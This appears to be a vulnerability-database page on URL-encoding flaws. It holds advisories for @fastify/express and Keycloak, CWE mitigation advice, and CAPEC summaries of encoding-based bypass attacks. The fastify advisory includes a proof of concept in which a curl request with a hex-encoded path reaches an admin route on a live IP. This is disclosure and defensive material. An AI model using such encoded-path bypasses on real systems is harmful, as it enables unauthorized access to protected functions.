process.exit(1);\n  }\n}\n\nstart();\n```\n\n**Step 2:** Execute the attack.\n\n```\n\u279c  ~ curl http://206.189.140.29:3000/%61dmin\n\u003c!DOCTYPE html\u003e\n\u003chtml lang=\"en\"\u003e\n\u003chead\u003e\n\u003cmeta charset=\"utf-8\"\u003e\n\u003ctitle\u003eError\u003c/title\u003e\n\u003c/head\u003e\n\u003cbody\u003e\n\u003cpre\u003eCannot GET /%61dmin\u003c/pre\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n\n(fastify express)\n\n\u279c  ~ curl http://206.189.140.29:3000/%61dmin\n{\"message\":\"Admin panel\"}\n```\n\nIt differs from [CVE-2026-22031](https://nvd.nist.gov/vuln/detail/CVE-2026-22031) because this is a different npm module with its own code.",
  "id": "GHSA-g6q3-96cp-5r5m",
  "modified": "2026-01-20T16:35:21Z",
  "published": "2026-01-20T16:35:21Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/fastify/fastify-express/security/advisories/GHSA-g6q3-96cp-5r5m"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22037"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fastify/fastify-express/commit/dc02a3fe1387f945143f22597baa42557d549a40"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/fastify/fastify-express"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fastify/fastify-express/releases/tag/v4.0.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "@fastify/express vulnerable to Improper Handling of URL Encoding (Hex Encoding)"
}

GHSA-G8Q8-FGGX-9R3Q

Vulnerability from github – Published: 2022-12-13 19:44 – Updated: 2023-01-25 21:37
VLAI
Summary
Keycloak vulnerable to path traversal via double URL encoding
Details

Keycloak does not properly validate URLs included in a redirect. An attacker could construct a malicious request to bypass validation and access other URLs and potentially sensitive information within the domain, or possibly conduct further attacks.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 20.0.0"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "org.keycloak:keycloak-parent"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "20.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-3782"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-177",
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-12-13T19:44:56Z",
    "nvd_published_at": "2023-01-13T06:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "Keycloak does not properly validate URLs included in a redirect. An attacker could construct a malicious request to bypass validation and access other URLs and potentially sensitive information within the domain, or possibly conduct further attacks.",
  "id": "GHSA-g8q8-fggx-9r3q",
  "modified": "2023-01-25T21:37:00Z",
  "published": "2022-12-13T19:44:56Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/keycloak/keycloak/security/advisories/GHSA-g8q8-fggx-9r3q"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3782"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keycloak/keycloak/pull/15982/commits/1987c942f527b9f3bbf2a86ba71ba8ae0154ac37"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2022-3782"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/keycloak/keycloak"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Keycloak vulnerable to path traversal via double URL encoding "
}

Mitigation MIT-44
Architecture and Design

Strategy: Input Validation

Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names.

Mitigation MIT-5
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
Mitigation MIT-20
Implementation

Strategy: Input Validation

Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked.

CAPEC-120: Double Encoding

The adversary utilizes a repeating of the encoding process for a set of characters (that is, character encoding a character encoding of a character) to obfuscate the payload of a particular request. This may allow the adversary to bypass filters that attempt to detect illegal characters or strings, such as those that might be used in traversal or injection attacks. Filters may be able to catch illegal encoded strings, but may not catch doubly encoded strings. For example, a dot (.), often used in path traversal attacks and therefore often blocked by filters, could be URL encoded as %2E. However, many filters recognize this encoding and would still block the request. In a double encoding, the % in the above URL encoding would be encoded again as %25, resulting in %252E which some filters might not catch, but which could still be interpreted as a dot (.) by interpreters on the target.

CAPEC-468: Generic Cross-Browser Cross-Domain Theft

An attacker makes use of Cascading Style Sheets (CSS) injection to steal data cross domain from the victim's browser. The attack works by abusing the standards relating to loading of CSS: 1. Send cookies on any load of CSS (including cross-domain) 2. When parsing returned CSS ignore all data that does not make sense before a valid CSS descriptor is found by the CSS parser.

CAPEC-64: Using Slashes and URL Encoding Combined to Bypass Validation Logic

This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple ways of encoding a URL and abuse the interpretation of the URL. A URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.

CAPEC-72: URL Encoding

This attack targets the encoding of the URL. An adversary can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL.